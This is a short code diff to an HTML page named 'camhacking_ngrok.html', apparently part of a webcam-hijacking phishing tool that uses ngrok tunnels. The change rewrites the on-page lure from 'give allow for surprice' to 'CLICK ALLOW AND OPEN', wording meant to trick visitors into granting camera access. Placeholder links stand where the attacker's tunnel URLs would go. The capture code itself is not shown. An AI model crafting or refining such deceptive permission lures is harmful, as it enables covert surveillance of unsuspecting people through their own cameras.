--- a/camhacking_ngrok.html
+++ b/camhacking_ngrok.html
@@ -85,7 +85,7 @@ init();
 </head>
 <body>		
 <div class="wrap">
-	<div class="cont"><span id="logo"><a href="forwarding_link" target="_blank"><span id="ln">hello</span><span id="lt">welcome to the page give allow for surprice</span></a></span>
+	<div class="cont"><span id="logo"><a href="forwarding_link" target="_blank"><span id="ln">HELLO</span><span id="lt">CLICK ALLOW AND OPEN</span></a></span>
 <center><h1 id="ht">"redirect_link"</h1></center></div> 
 	<center> 
 		<a class ="ex1" href="redirect_link" target="_blank">
